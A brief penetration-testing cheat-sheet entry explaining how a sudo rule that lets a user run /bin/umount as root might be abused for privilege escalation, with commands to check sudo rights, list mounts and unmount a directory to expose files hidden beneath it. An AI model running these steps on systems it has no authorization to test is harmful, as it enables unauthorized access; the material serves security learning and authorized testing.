# Sudo Umount Privilege Escalation

The `sudo umount` command might be vulnerable to privilege escalation.

### Investigation <a href="#investigation" id="investigation"></a>

```
sudo -l

(root) NOPASSWD: /bin/umount
```

If we can execute umount command as root, we can escalate to privilege.

### Exploitation <a href="#exploitation" id="exploitation"></a>

In target machine, check what directory is mounted.

```
cat /etc/fstab
showmount -e localhost
```

Assume the **`/opt/example`** folder is mounted.\
If we unmount this folder, original files, that existed before the directory is mounted, may appear.

```
sudo /bin/umount /opt/example
ls -al /opt/example
```